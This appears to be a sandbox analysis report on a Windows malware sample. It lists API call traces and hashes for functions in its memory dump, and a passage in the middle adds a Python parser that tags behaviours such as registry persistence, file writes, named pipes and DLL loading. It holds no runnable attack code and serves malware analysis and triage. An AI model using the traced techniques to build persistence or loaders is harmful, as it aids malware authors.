                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04567D1E
                                                            • lstrcpy.KERNEL32(00000020,?), ref: 04567D3D
                                                            • lstrlen.KERNEL32(?), ref: 04567D47
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D88
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D9B
                                                            • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 04567DBF
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04567DE1
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 04567E07
                                                            • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 04567E23
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3323474148-0
                                                            • Opcode ID: c3212897b67c89254d1eeed4446af8ab6842061719b23fc05b5bd4d19316e06d
                                                            • Instruction ID: 737338055c4431d27d2b962aa36e8e2a24c7de0dde11b5d3cb15541cf50aac69
                                                            • Opcode Fuzzy Hash: c3212897b67c89254d1eeed4446af8ab6842061719b23fc05b5bd4d19316e06d
                                                            • Instruction Fuzzy Hash: 28715A71504702EFD721DF25D884A5BBBE8FF48318F04492EF59AA3250DB35E948EB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C1C
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C35
                                                            • StrChrA.SHLWAPI(?,0000002C), ref: 04567C40
                                                            • StrTrimA.SHLWAPI(00000001,?), ref: 04567C59
                                                            • lstrlen.KERNEL32(?,?,00000001,?,?), ref: 04567CFC
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 04567D1E
                                                            • lstrcpy.KERNEL32(00000020,?), ref: 04567D3D
                                                            • lstrlen.KERNEL32(?), ref: 04567D47
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D88
                                                            • memcpy.NTDLL(?,?,?), ref: 04567D9B
                                                            • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 04567DBF
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 04567DE1
                                                            • HeapFree.KERNEL32(00000000,?,?,00000001,?,?), ref: 04567E07
                                                            • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?), ref: 04567E23
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                            • String ID:
                                                            • API String ID: 3323474148-0
                                                            • Opcode ID: 94c83a74f71fa44734551ffbf182f4e49899bdaa936743901f47e52ecbf95176
                                                            • Instruction ID: 6447f1c80fd465f257d57ca32e39daca3fb86554ecbe2ea0acaf54a1fa8cbc53
                                                            • Opcode Fuzzy Hash: 94c83a74f71fa44734551ffbf182f4e49899bdaa936743901f47e52ecbf95176
                                                            • Instruction Fuzzy Hash: 9E516D71504301EFD721DF25D844A5ABBE8FB48318F04492EF596E3251DB35E948EB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0457BB46
                                                            • lstrlen.KERNEL32(?,?,00000000), ref: 0457BB4D
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457BB64
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0457BB75
                                                            • lstrcat.KERNEL32(?,?), ref: 0457BB91
                                                            • lstrcat.KERNEL32(?,?), ref: 0457BBA2
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457BBB3
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0457BC50
                                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0457BC89
                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0457BCA2
                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0457BCAC
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0457BCBC
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0457BCD5
                                                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0457BCE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                                            • String ID:
                                                            • API String ID: 333890978-0
                                                            • Opcode ID: fe07459be820c0cad93e4ad36ac8cc4458159bd87e5977447618794074714546
                                                            • Instruction ID: ed04c40863a7dcb3affe075998d3ad88361bf341869414e58d12a456601b3ff7
                                                            • Opcode Fuzzy Hash: fe07459be820c0cad93e4ad36ac8cc4458159bd87e5977447618794074714546
                                                            • Instruction Fuzzy Hash: 39518B72400109FFCB019FA4EC84CAE7BBDFB48348B158029F615A7211DE39AE49EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wsprintfA.USER32 ref: 045766C9
                                                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 045766DC
                                                            • CloseHandle.KERNEL32(00000000), ref: 045767F4
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memset.NTDLL ref: 045766FF
                                                            • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 0457677E
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 04576793
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 045767AB
                                                            • GetLastError.KERNEL32(045754DA,?,?,?,?,?,?,?,00000040), ref: 045767C3
                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 045767CF
                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 045767DE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                                            • String ID: 0x%08X$W
                                                            • API String ID: 1559661116-2600449260
                                                            • Opcode ID: 16937818ea72cc4bcca1bb22065ef13a8a48a7fd57187ffe22cd14de46afc4e5
                                                            • Instruction ID: 883f08439e3e9ad43b340fc012bffb7dca0617d3977ed2b2ab9fa32d01d08d05
                                                            • Opcode Fuzzy Hash: 16937818ea72cc4bcca1bb22065ef13a8a48a7fd57187ffe22cd14de46afc4e5
                                                            • Instruction Fuzzy Hash: 14417FB1900609EFDB10DFA4D884A9EBBF8FF08354F108529F559E7240D775EA54EB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,?,?,?,0457CCC5,?,?), ref: 04577E74
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0457CCC5,?,?), ref: 04577E9D
                                                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04577EBD
                                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 04577ED8
                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,0457CCC5,?,?), ref: 04577EE4
                                                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,0457CCC5,?,?), ref: 04577EE7
                                                            • SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577EF3
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F10
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F2A
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F40
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F56
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F6C
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 04577F82
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577FAB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                                            • String ID:
                                                            • API String ID: 3772355505-0
                                                            • Opcode ID: 78d213038d3914bf6f155ac8bdb85f12c28dc73b212656ae437efc83132b4904
                                                            • Instruction ID: cc678fc1f803abc265805e45ac084818a45b1a4e38b5d11d0bd0aab31bf0a671
                                                            • Opcode Fuzzy Hash: 78d213038d3914bf6f155ac8bdb85f12c28dc73b212656ae437efc83132b4904
                                                            • Instruction Fuzzy Hash: 223127B150120BEFD710DF65ED88D667BECFF09344B049529F909E7211EB39E809ABA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,045612BE,?,?,?), ref: 045780FB
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 04578106
                                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 0457810E
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04578123
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 04578134
                                                            • lstrcatW.KERNEL32(00000000,?), ref: 04578146
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 0457814B
                                                            • lstrcatW.KERNEL32(00000000,045863D0), ref: 04578157
                                                            • lstrcatW.KERNEL32(00000000), ref: 0457815F
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 04578164
                                                            • lstrcatW.KERNEL32(00000000,045863D0), ref: 04578170
                                                            • lstrcatW.KERNEL32(00000000,00000002), ref: 0457818B
                                                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 04578193
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,045612BE,?,?,?), ref: 045781A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                                            • String ID:
                                                            • API String ID: 3635185113-0
                                                            • Opcode ID: 311f4f9441f9005a782d489eba65f4f7ddc64dbcef6d1b9456f055024ceb9629
                                                            • Instruction ID: a1735b3f8ad1d728fecbdd20982f2f1c11a7894a4ef61739bb9a598b52abea9e
                                                            • Opcode Fuzzy Hash: 311f4f9441f9005a782d489eba65f4f7ddc64dbcef6d1b9456f055024ceb9629
                                                            • Instruction Fuzzy Hash: 3321DC32100216EFC321AF65EC88E6B7BACFF85B90F01042CF545A2251DF69EC09FA65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 04570E2E: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 04570E73
                                                              • Part of subcall function 04570E2E: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 04570E8B
                                                              • Part of subcall function 04570E2E: WaitForSingleObject.KERNEL32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F53
                                                              • Part of subcall function 04570E2E: HeapFree.KERNEL32(00000000,?,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F7C
                                                              • Part of subcall function 04570E2E: HeapFree.KERNEL32(00000000,04572333,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F8C
                                                              • Part of subcall function 04570E2E: RegCloseKey.ADVAPI32(00000000,?,00000000,04572333,00000000,73BCF5B0,0456824E,?,00000001), ref: 04570F95
                                                            • lstrcmp.KERNEL32(?,?), ref: 0456B991
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456B9BD
                                                            • GetCurrentThreadId.KERNEL32 ref: 0456BA6E
                                                            • GetCurrentThread.KERNEL32 ref: 0456BA7F
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,0456C3DA,?,00000001), ref: 0456BABC
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000000,?,0456C3DA,?,00000001), ref: 0456BAD0
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0456BADE
                                                            • wsprintfA.USER32 ref: 0456BAF6
                                                              • Part of subcall function 04575440: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,04569999,00000000,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 0457544A
                                                              • Part of subcall function 04575440: lstrcpy.KERNEL32(00000000,00000000), ref: 0457546E
                                                              • Part of subcall function 04575440: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,04577991,?,?,?,00000000,?,00000000,00000000), ref: 04575475
                                                              • Part of subcall function 04575440: lstrcat.KERNEL32(00000000,?), ref: 045754CC
                                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0456BB01
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0456BB18
                                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0456BB29
                                                            • HeapFree.KERNEL32(00000000,?), ref: 0456BB35
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                                            • String ID:
                                                            • API String ID: 773763258-0
                                                            • Opcode ID: f8056c31e85c2925510d45a137656a84eca9b7db4396d9f53a8ec870de5c7d56
                                                            • Instruction ID: 4eb414c2316a0c55a6fdb6c30af145da39b869aa89cb48a3017fdd65427ad33f
                                                            • Opcode Fuzzy Hash: f8056c31e85c2925510d45a137656a84eca9b7db4396d9f53a8ec870de5c7d56
                                                            • Instruction Fuzzy Hash: E471E371900219EFDB11DFA5E884EAEBBB9FB08314F048069E505F7261DB35B945EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0457C1AD
                                                            • memcpy.NTDLL(?,?,00000010), ref: 0457C1D0
                                                            • memset.NTDLL ref: 0457C21C
                                                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 0457C230
                                                            • GetLastError.KERNEL32 ref: 0457C25E
                                                            • GetLastError.KERNEL32 ref: 0457C2A5
                                                            • GetLastError.KERNEL32 ref: 0457C2C4
                                                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 0457C2FE
                                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0457C30C
                                                            • GetLastError.KERNEL32 ref: 0457C386
                                                            • ReleaseMutex.KERNEL32(?), ref: 0457C398
                                                            • RtlExitUserThread.NTDLL(?), ref: 0457C3AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
                                                            • String ID:
                                                            • API String ID: 4037736292-0
                                                            • Opcode ID: 237cf8ad78125d4622ed742bd9576eb4640fd88f9b678bf3a82961bc2eec822b
                                                            • Instruction ID: 3f80ee9733881aef926625cbcc0b18730ee5c01655ae324c33f70575720fa1a6
                                                            • Opcode Fuzzy Hash: 237cf8ad78125d4622ed742bd9576eb4640fd88f9b678bf3a82961bc2eec822b
                                                            • Instruction Fuzzy Hash: CF616C71504701AFD721DF65A848A1BB7F9FF84720F008A2DFA96D6180EB75E908EB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000), ref: 04565D94
                                                            • lstrlen.KERNEL32(?), ref: 04565D9C
                                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04565DAC
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04565DCB
                                                            • lstrlen.KERNEL32(?), ref: 04565DE0
                                                            • lstrlen.KERNEL32(?), ref: 04565DEE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 04565E3C
                                                            • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04565E60
                                                            • lstrlen.KERNEL32(?), ref: 04565E93
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04565EBE
                                                            • HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000,?,?,?,?), ref: 04565ED5
                                                            • HeapFree.KERNEL32(00000000,?,?), ref: 04565EE2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                                            • String ID:
                                                            • API String ID: 904523553-0
                                                            • Opcode ID: 99b558b3abef42d8cf9192e445c98b0352f8356141e2339b689ae64890ca8953
                                                            • Instruction ID: 3b42915f564cdfcdbcdbb86e4e0c814de8b8eeac6c9a63c3c44392d560f8aa9a
                                                            • Opcode Fuzzy Hash: 99b558b3abef42d8cf9192e445c98b0352f8356141e2339b689ae64890ca8953
                                                            • Instruction Fuzzy Hash: 2A41487190024AFBDF129FA5EC44AAE7BB9FB44310F108069F912A7250EB35EE55EB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0457AD54
                                                            • WaitForSingleObject.KERNEL32(000003BC,00000000), ref: 0457AD76
                                                            • ConnectNamedPipe.KERNEL32(?,?), ref: 0457AD96
                                                            • GetLastError.KERNEL32 ref: 0457ADA0
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0457ADC4
                                                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,00000010,00000000), ref: 0457AE07
                                                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0457AE10
                                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0457AE19
                                                            • CloseHandle.KERNEL32(?), ref: 0457AE2E
                                                            • GetLastError.KERNEL32 ref: 0457AE3B
                                                            • CloseHandle.KERNEL32(?), ref: 0457AE48
                                                            • RtlExitUserThread.NTDLL(000000FF), ref: 0457AE5E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                                            • String ID:
                                                            • API String ID: 4053378866-0
                                                            • Opcode ID: 5f99d2dd2b33027a9aaf5c50daafd51be5161992e1eac2bae390311541ff3f94
                                                            • Instruction ID: 8305c69a3213e99390a2fbc0308f89c6177b1fd9982d668bb353dcf538bbab9d
                                                            • Opcode Fuzzy Hash: 5f99d2dd2b33027a9aaf5c50daafd51be5161992e1eac2bae390311541ff3f94
                                                            • Instruction Fuzzy Hash: CA316070404305EFEB119F24EC8896FBBA9FB44355F004A3DF565E6090DB74EE09AB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 0456A5FD
                                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,04561E48,?,00000094,00000000,?,?,00000000,?), ref: 0456A615
                                                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0456A624
                                                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,04561E48,?,00000094,00000000,?,?,00000000,?), ref: 0456A637
                                                            • GetTickCount.KERNEL32 ref: 0456A63B
                                                            • wsprintfA.USER32 ref: 0456A652
                                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0456A68D
                                                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 0456A6AA
                                                            • lstrlen.KERNEL32(00000000), ref: 0456A6B4
                                                            • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0456A6C4
                                                            • RegCloseKey.ADVAPI32(?), ref: 0456A6D0
                                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 0456A6DE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                                            • String ID:
                                                            • API String ID: 3778301466-0
                                                            • Opcode ID: ba5e3516eff86ef9a09b165b21ba52dcbd1c93394c12081f51203e439ac46e9a
                                                            • Instruction ID: 7723d191480eeaa3068ca7e0e41913c96db2118cede9dc02ed4acbdd4366b2c1
                                                            • Opcode Fuzzy Hash: ba5e3516eff86ef9a09b165b21ba52dcbd1c93394c12081f51203e439ac46e9a
                                                            • Instruction Fuzzy Hash: 82316971400219FFDB119FA5DC88DAF7BACFF45394B005029F906E7101DA38AE49EBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
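The function blocks above all share one machine-readable shape: an "APIs" header, one "• Name.MODULE(args), ref: ADDR" line per call site (subcall lines carry a "Part of subcall function XXXX:" prefix, and calls without a recorded argument list have no parentheses), then the dump source, similarity hashes and uniqueness score. Reading hundreds of these by eye is slow, so the following is an added example, written by the editor and not part of the Joe Sandbox report or the sample's code: a small Python parser for this listing format plus a few triage rules that turn API names, argument values and call-site order into behaviour tags (an HKCU registry write rooted at handle 80000001 followed by RegSetValueExA, a CreateFileA with GENERIC_WRITE plus WriteFile, a SetCurrentDirectoryW issued before LoadLibraryW, and so on). The rule names and thresholds are the editor's own heuristics, and the embedded sample is constructed from three blocks of the listing above with their argument lists and metadata trimmed.

```python
"""Triage helper for per-function API listings in the format shown above.
Added by the editor; rule names and heuristics are the editor's own assumptions."""
import re
from dataclasses import dataclass, field

# One "• Name.MODULE(args), ref: ADDR" line; the argument list and the
# "Part of subcall function XXXX:" prefix are both optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
OPCODE_RE = re.compile(r"^\s*•\s*Opcode ID:\s*(?P<id>[0-9a-f]+)")
HKEY_CURRENT_USER = 0x80000001   # root handle rendered as 80000001 in the listing
GENERIC_WRITE = 0x40000000       # bit set in the C0000000 dwDesiredAccess seen above

@dataclass
class ApiCall:
    api: str
    args: list         # ints for resolved hex values, None for "?"
    ref: int           # address of the call site
    subcall: str = ""  # non-empty when the call lives in a callee

@dataclass
class Function:
    opcode_id: str = ""
    calls: list = field(default_factory=list)

    def direct(self, *apis):
        """Calls made by this function itself (subcall lines excluded)."""
        return [c for c in self.calls if not c.subcall and (not apis or c.api in apis)]

def parse_arg(tok):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-Fa-f]+", tok) else None

def parse_listing(text):
    funcs, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":            # every function block opens with this header
            cur = Function()
            funcs.append(cur)
        elif cur is not None and (m := CALL_RE.match(line)):
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], args, int(m["ref"], 16), m["sub"] or ""))
        elif cur is not None and (m := OPCODE_RE.match(line)):
            cur.opcode_id = m["id"]
    return funcs

def flags(fn):
    """Behavioural tags derived from API names, argument values and call order."""
    names = {c.api for c in fn.direct()}
    out = set()
    for c in fn.direct("RegCreateKeyA", "RegCreateKeyW", "RegCreateKeyExA", "RegCreateKeyExW",
                       "RegOpenKeyExA", "RegOpenKeyExW"):
        if c.args and c.args[0] == HKEY_CURRENT_USER and names & {"RegSetValueExA", "RegSetValueExW"}:
            out.add("hkcu_registry_write")
    for c in fn.direct("CreateFileA", "CreateFileW"):
        if len(c.args) > 1 and c.args[1] is not None and c.args[1] & GENERIC_WRITE and "WriteFile" in names:
            out.add("writes_file")
    if names & {"CopyFileA", "CopyFileW"} and names & {"CreateDirectoryA", "CreateDirectoryW"}:
        out.add("copies_file_to_new_dir")
    if "ConnectNamedPipe" in names:
        out.add("named_pipe_server")
    # Call-site addresses rise through straight-line code, so a SetCurrentDirectory at a
    # lower address than a LoadLibrary means the DLL is resolved from a directory of choice.
    chdirs = [c.ref for c in fn.direct("SetCurrentDirectoryA", "SetCurrentDirectoryW")]
    loads = [c.ref for c in fn.direct("LoadLibraryA", "LoadLibraryW")]
    if chdirs and loads and min(chdirs) < max(loads):
        out.add("loadlibrary_after_chdir")
    if names & {"GetTempPathA", "GetTempPathW", "GetTempFileNameA", "GetTempFileNameW"}:
        out.add("uses_temp_path")
    return out

def triage(text):
    """Map each tagged function (first 8 hex chars of its Opcode ID) to its sorted tags."""
    return {fn.opcode_id[:8]: sorted(t) for fn in parse_listing(text) if (t := flags(fn))}

# Constructed sample: three blocks from the listing above, trimmed to the lines the parser needs.
SAMPLE = """\
APIs
• GetTempPathA.KERNEL32(00000000,00000000,?,?,04561E48,?,00000094,00000000,?,?,00000000,?), ref: 0456A615
• wsprintfA.USER32 ref: 0456A652
• RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0456A68D
• RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 0456A6C4
• Opcode ID: ba5e3516eff86ef9a09b165b21ba52dcbd1c93394c12081f51203e439ac46e9a
APIs
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,00000000), ref: 0457BC89
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 0457BCA2
• Opcode ID: fe07459be820c0cad93e4ad36ac8cc4458159bd87e5977447618794074714546
APIs
  • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,0457CCC5,?,?), ref: 04577EE4
• LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,0457CCC5,?,?), ref: 04577EE7
• SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,0457CCC5,?,?), ref: 04577EF3
• Opcode ID: 78d213038d3914bf6f155ac8bdb85f12c28dc73b212656ae437efc83132b4904
"""

if __name__ == "__main__":
    for oid, tags in triage(SAMPLE).items():
        print(oid, ", ".join(tags))
```

Run against the full report text instead of SAMPLE to get one line per tagged function; the "ref" ordering heuristic only holds within straight-line code, so treat "loadlibrary_after_chdir" as a prompt to open the function in the disassembly, not as a verdict.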

                                                            APIs
                                                            • RtlImageNtHeader.NTDLL(?), ref: 04577920
                                                            • GetCurrentThreadId.KERNEL32 ref: 04577936
                                                            • GetCurrentThread.KERNEL32 ref: 04577947
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000), ref: 045790FF
                                                              • Part of subcall function 045790ED: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579118
                                                              • Part of subcall function 045790ED: GetCurrentThreadId.KERNEL32 ref: 04579125
                                                              • Part of subcall function 045790ED: GetSystemTimeAsFileTime.KERNEL32(0456EE33,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?,0000000E), ref: 04579131
                                                              • Part of subcall function 045790ED: GetTempFileNameA.KERNEL32(00000000,00000000,0456EE33,00000000,?,?,?,04577791,00000929,00000000,?,?,045799D0,00000000,00000000,?), ref: 0457913F
                                                              • Part of subcall function 045790ED: lstrcpy.KERNEL32(00000000), ref: 04579161
                                                              • Part of subcall function 0456997D: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 045699E8
                                                              • Part of subcall function 0456997D: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,?,00000000,73B75520,00000000,?,04577991,?,?,?,00000000), ref: 04569A10
                                                            • HeapFree.KERNEL32(00000000,?,04561F4D,?,?,?,?,?,00000000,?,00000000,00000000,?), ref: 045779C1
                                                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000,?,00000000,00000000,?), ref: 045779CD
                                                            • RtlAllocateHeap.NTDLL(00000000,00000400,00000000), ref: 04577A1C
                                                            • wsprintfA.USER32 ref: 04577A34
                                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,04561F4D), ref: 04577A3F
                                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000,?,?,?,?,?,?,?,?,?,04561F4D), ref: 04577A56
                                                            Strings
                                                            Memory Dump Source
